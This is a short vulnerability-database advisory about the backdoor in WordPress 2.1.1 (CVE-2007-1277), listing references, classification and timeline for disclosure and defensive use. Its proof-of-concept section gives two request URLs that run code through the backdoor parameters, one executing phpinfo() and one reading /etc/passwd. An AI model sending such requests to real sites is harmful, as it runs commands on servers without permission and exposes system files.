WordPress 2.1.1 - Command Execution Backdoor



Proof of Concept
http://www.example.com/wp-includes/feed.php?ix=phpinfo();
http://www.example.com/wp-includes/theme.php?iz=cat /etc/passwd

Affects WordPress

fixed in version 2.1.2

References

CVE 2007-1277
SecurityFocus 22797
URL https://exchange.xforce.ibmcloud.com/vulnerabilities/32807
URL https://wordpress.org/news/2007/03/upgrade-212/

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Views 4313
Verified No
WPVDB ID 6028

Timeline

Publicly Published 2014-08-01 (almost 6 years ago)
Added 2014-08-01 (almost 6 years ago)
Last Updated 2019-10-21 (9 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin